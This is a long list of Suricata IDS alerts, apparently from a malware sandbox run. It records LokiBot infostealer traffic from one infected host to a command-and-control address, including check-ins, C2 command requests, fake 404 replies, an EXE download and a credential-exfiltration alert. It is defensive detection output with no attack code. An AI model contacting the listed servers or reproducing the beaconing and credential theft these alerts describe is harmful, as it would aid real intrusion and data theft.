Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49218 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49208
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49218 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49218 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49218 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49218 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49188
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49173
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49198
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49267 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49267 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49218
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49214
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49180
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49276 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49276 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49276 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49267 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49249 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49246
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49254
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49267 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.231:80 -> 192.168.2.22:49170
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49235
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49200
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49193
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49279 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49279 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49279 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49223 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49223 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49216 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49216 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49261
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49216 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49171 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49223 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49274 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49276 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49222 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49274 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49276 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49213
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49201
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.41:80
